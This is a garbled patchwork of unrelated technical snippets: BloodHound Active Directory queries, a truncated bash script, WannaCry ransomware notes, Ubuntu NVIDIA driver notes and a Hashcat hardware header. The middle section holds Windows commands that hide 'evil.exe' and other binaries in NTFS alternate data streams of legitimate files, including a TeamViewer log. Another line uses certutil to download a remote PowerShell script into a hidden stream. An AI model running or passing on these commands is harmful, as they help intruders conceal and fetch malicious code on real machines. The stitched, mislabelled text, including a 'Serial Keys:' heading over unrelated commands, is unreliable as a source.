(THIS LIST IS OBSOLETED, check out the latest version here: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md )
- Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
- Returns a summary report of machines grouped by operating system version, along with the number of machines running each OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC
#!/bin/bash
# DO NOT run the line 167 standalone. It will remove the necessary files besides the junk!
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h\|\-\-no\-deb\|\-\-no\-install\|\-\-no\-cleaning\|\-\-assume\-debian"
then :
else echo wrong entry\(ies\) !
help=yes
fi
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h" || [ "$help" = yes ]
Serial Keys:
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
- Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
- Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses EternalBlue MS17-010 to propagate.
- Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
- Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
- Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up, the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).
update: A minor variant of the viru
This was tested on a ThinkPad P70 laptop with Intel integrated graphics and an NVIDIA GPU:
lspci | egrep 'VGA|3D'
00:02.0 VGA compatible controller: Intel Corporation Device 191b (rev 06)
01:00.0 VGA compatible controller: NVIDIA Corporation GM204GLM [Quadro M3000M] (rev a1)
A reason to use the integrated graphics for display is if installing the NVIDIA drivers causes the display to stop working properly.
In my case, Ubuntu would get stuck in a login loop after installing the NVIDIA drivers.
This happened regardless of whether I installed the drivers from the "Additional Drivers" tab in "System Settings" or from the ppa:graphics-drivers/ppa on the command line.
Product: Sagitta Brutalis 1080 (PN S3480-GTX-1080-2697-128)
Software: Hashcat v3.00-beta-145-g069634a, Nvidia driver 367.18
Accelerator: 8x Nvidia GTX 1080 Founders Edition